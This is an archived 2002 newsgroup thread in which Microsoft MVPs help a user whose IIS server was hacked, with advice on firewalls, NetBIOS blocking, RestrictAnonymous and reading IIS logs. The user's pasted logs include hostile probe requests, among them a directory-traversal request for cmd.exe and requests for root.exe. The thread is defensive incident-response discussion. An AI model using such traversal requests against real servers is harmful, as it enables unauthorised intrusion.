Re: How do I block just one port from being listened to on my server

From: Karl Levinson [x y] mvp (levinson_k@excite.com)
Date: 12/18/02 

From: "Karl Levinson [x y] mvp" <levinson_k@excite.com>
Date: Tue, 17 Dec 2002 22:03:13 -0500

Any chance you've got an easy to guess password on one of your accounts,
especially one of the accounts in the Administrators group? That could have
permitted access.

You should be able to find some way to block Netbios to and from the
internet [e.g. TCP and UDP ports 135 - 139 and 445] or disable Netbios or
Netbios over TCP/IP. I'm honestly not sure about file and print sharing
being required for IIS.

Searching www.google.com for RestrictAnonymous [or RestrictAnonymousSam for
Windows XP] can help you do a little bit also to secure anonymous hackers
from getting a list of login IDs and share names from your computer.
RestrictAnonymous should be set to the highest setting which is 2 for
Windows 2000 and 1 for NT and XP, though in NT this setting is not 100%
secure and in Windows 2000 you have to use the vulnerable setting of 1 or
lower for domain controllers. Also the hardening checklists in the
previously mentioned URL:
http://securityadmin.info/faq.htm#harden

There ARE other theoretically vulnerable services, it's just that these are
the most common points of entry for script kiddies like this.

"George Hester" <hesterloli@hotmail.com> wrote in message
news:#d#MvNhpCHA.2008@TK2MSFTNGP12...
You may not believe but:

"..have the IIS FTP service running with the anonymous user having both read
and write access to a folder." No. And I sure wouldn't put a virtual FTP
folder on my Zip drive. There's no space on that it's nearly full. Got
fuller when the hacker came by he had about 1MB left. I kinda thought that
one was funny.

"or NetBIOS / Client for Microsoft Networks / File and Printer Sharing."
Yes I had NetNIOS over TCP\IP going. Necessary for my SQL Replication
Folder I believe. There are no shares other then defaults and they are all
Read only. Also isn't Microsoft Networks / File and Printer Sharing
necessary when installing IIS? That's why I haven't removed it.

"In the IIS logs, you're looking for any line that has .EXE or % and that
also has a code 200 or 502 in it." Well I looked through ALL my logs;
W3SVC; FTPSVC; and SMTPSVC for .exe. They are all FrontPage Extension calls
in which case 200 thank goodness or like

2002-12-15 00:52:44 24.195.33.230 GET /scripts/root.exe 404 2 -

OR

Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)
2002-12-15 01:21:18 24.114.139.244 GET /scripts/root.exe 404 2 -
2002-12-15 01:21:18 24.114.139.244 GET /MSADC/root.exe 404 2 -
2002-12-15 01:21:18 24.114.139.244 GET /c/winnt/system32/cmd.exe 404 3 -
2002-12-15 01:21:18 24.114.139.244 GET /d/winnt/system32/cmd.exe 404 3 -
2002-12-15 01:21:19 24.114.139.244 GET
/scripts/..%5c../winnt/system32/cmd.exe 500 87 -

Actually I'm no expert as you may have surmised but I do keep my head above
water.

I know about the tftp.exe. That won't show in the logs will it? So with
that one I just said oh well that may have happened. But I looked believe
me in any logs I have and I couldn't find the upload of that su.exe. And
why they sent it to a drive that had about 15MB of free space that they were
trying to upload I could tell something that was over 40MB was another
mystery to me. I atttributed it to that was the only place they had
permissions to do it. It was FAT.

Well I'll be testing that Firewall out that you gave the link to. What you
said reassurred me somewhat. I just don't want it blocking everything by
default and where I have to fight with it to determine what it's blocking
when things don't go as expected. 

--
George Hester
__________________________________
"Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
news:uRMBKqgpCHA.2456@TK2MSFTNGP12...
> Oops, if you had mentioned the root problem, we could have given you a
more
> accurate answer immediately.  Blocking one port isn't the answer.
>
> IMHO you've got it backwards.  Blocking these with TCP/IP filtering or
IPSec
> causes the worst headaches, because there are no logs to tell you what has
> gone wrong or how to fix it, or even whether or not the firewall is the
> cause.  Firewalls aren't 100% problem free, but nothing in life is, not
even
> if you used just plain Windows with nothing else on it.
>
> Those people who complain about a firewall blocking their chat would have
> the same problem with TCP/IP filtering or IPsec, only worse because
there's
> no log.  You can configure firewalls like the free www.sygate.com to block
> just one port, if you wish.
>
> The FTP attack you received had nothing to do with NTFS or FAT, these
things
> can be written to NTFS as well.  Also, blocking just that one port isn't
> going to help you, because the hacker will just choose another port, there
> are 65,535 TCP ports to choose from.
>
> You probably either have the IIS FTP service running with the anonymous
user
> having both read and write access to a folder, or more likely you have a
> running service that is vulnerable, probably either IIS web services or
> NetBIOS / Client for Microsoft Networks / File and Printer Sharing.  To
fix
> this, you should probably secure your machine properly, using the
> instructions below.
>
> http://securityadmin.info/faq.htm#re-secure
> http://securityadmin.info/faq.htm#harden  [how to secure your computer,
> including patches and correct configuration]
>
> Before you do that, check your IIS logs [or your firewall logs, if you had
> any] to try to determine how the hack occurred.  In the IIS logs, you're
> looking for any line that has .EXE or % and that also has a code 200 or
502
> in it.  There you may see exactly what commands the hackers used to do
this.
> Likely TFTP.EXE was one of the commands used.
>
> http://securityadmin.info/faq.htm#ftpfolder    [more info about one
similar
> FTP exploit]
> http://securityadmin.info/faq.htm#hacked [how to find and try to remove
> signs of hacking]
> http://securityadmin.info/faq.htm#iislogs2
> http://securityadmin.info/faq.htm#iislogs
>
>
>
> "George Hester" <hesterloli@hotmail.com> wrote in message
> news:#SfAinepCHA.2620@TK2MSFTNGP10...
> Believe me firewalls are starting to look better to me.  Why am I averse
to
> them?  Well because it is an added possible issue when things do not go as
> expected.  For example.  Have you ever heard of people who complain that
> they cannot receive or send files in MSN Messenger?  Well I sit here
> twiddling my thumbs while they turn this on turn this off unitl they come
> back and we try it again.  I just don't want to be hassled with that.
>
> And if I do know the IP that is doing this hacking how does that help
> anything?  These "people" are using proxies and use a different IP all the
> time.  Then I'm into the realm of blocking ranges of IPs.  Then I'm into
the
> realm of blocking ALL IPs.  Can't have a public web site doing that.
>
> I had someone who ftp'd a executable to my Zip disk and somehow installed
> it.  It appeared in HKLM\Software.  It was ServU FTP Server. They then
> started uploading files to my Zip disk.  They didn't get very far because
I
> heard my Zip disk whirring.  Zip was FAT and so I assume that's why they
did
> it there.  It's the only non-NTFS File System on my System.
>
> They used port 968 and so I thought I could filter out all ports from
> accepting FTP except port 21.  But the IPSec seems to be more then I need
> and not sufficient for what I want.
>
> That's why a Firewall is starting to look necessary.
>
> --
> George Hester
> __________________________________
> "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
> news:#pjlqodpCHA.1964@TK2MSFTNGP10...
> > I agree.  Additionally, you forgot to mention what version of Windows
> you're
> > running, which makes a big difference.  If you're running 2000 or XP,
you
> > can use IPSec filtering.  I really don't know your aversion to
firewalls,
> > there are several free ones including www.sygate.com  For my money,
> blocking
> > this with a firewall of some sort is often the best way to do this,
since
> > you also get logging and alerting.  If someone hacks into your system,
> > you're going to want to see what their IP address was, and without a
> > firewall you won't have a clue who did it.  More info on IPsec and other
> > free and not free firewalls and packet filtering options:
> >
> > http://securityadmin.info/faq.htm#firewall  [including a section on
IPsec]
> > http://securityadmin.info/faq.htm#harden
> >
> > Note that just blocking a port from receiving new inbound connections
may
> > not be enough to secure your computer, since outbound connections can be
> > used to steal data from your computer, remote control your computer,
etc.
> >
> > If you need to know what program you'd need to disable to stop a certain
> > port from listening, try using Vision from www.foundstone.com/knowledge
> >
> >
> >
> > "S. Pidgorny [MVP]" <slavickp@yahoo.com> wrote in message
> > news:#gOkaPapCHA.1644@TK2MSFTNGP10...
> > > George,
> > >
> > > Maybe you can just stop the service running on the port or unbimd it
> from
> > > the NIC?
> > >
> > >
> > > --
> > > Svyatoslav Pidgorny, MS MVP, MCSE
> > > -= F1 is the key =-
> > >
> > > "George Hester" <hesterloli@hotmail.com> wrote in message
> > > news:OarZV4YpCHA.1876@TK2MSFTNGP10...
> > > without a Firewall.  I looked at TCP\IP filtering but that only gives
us
> > the
> > > option of blocking all ports except.  I would prefer to allow all
ports
> > > except.  For me it is safer to do one thing at a time then hit the
sever
> > > over the head with a block all except.
> > >
> > > --
> > > George Hester
> > > __________________________________
> > >
> > >
> >
> >
>
>

Relevant Pages

  • Re: Strange WAN Activity
    ... > firewall logs for a possible TCP FIN scan that keeps ... > company's intranet server IP and its port 80 across our ... > My firewall is a Sonicwall Pro 200 and I'm running W2K ... It's difficult to be sure without inspecting the web server for signs of ...
    (microsoft.public.win2000.security)
  • Re: Identifying Internet Attacks
    ... contain the hacker to a particular machine, leave the machine on the network ... Some firewall software such as ... open ports; however, this will not identify which program is using the port. ... firewall logs, the IIS web and ftp server logs and Windows security event ...
    (microsoft.public.inetserver.iis.security)
  • Re: false portscan alarm
    ... What is the reason of that treffic? ... and the browser and/or the "personal firewall" had decided to close those ... which each have a local source port above 1024 opened outgoing to port 80 ... I've had a dig through my own PIX logs, and while there is nothing for today ...
    (comp.security.firewalls)
  • Re: How do I block just one port from being listened to on my server
    ... Blocking one port isn't the answer. ... Blocking these with TCP/IP filtering or IPSec ... > Those people who complain about a firewall blocking their chat would have ...
    (microsoft.public.security)
  • Re: Inaccessible Port 80 - Pentest
    ... donot think a firewall would block be blocking. ... A mixture of layer 3 port filtering to restrict you to port 80 would seem to ... Internet, open one port on it and then block it from public use? ...
    (Pen-Test)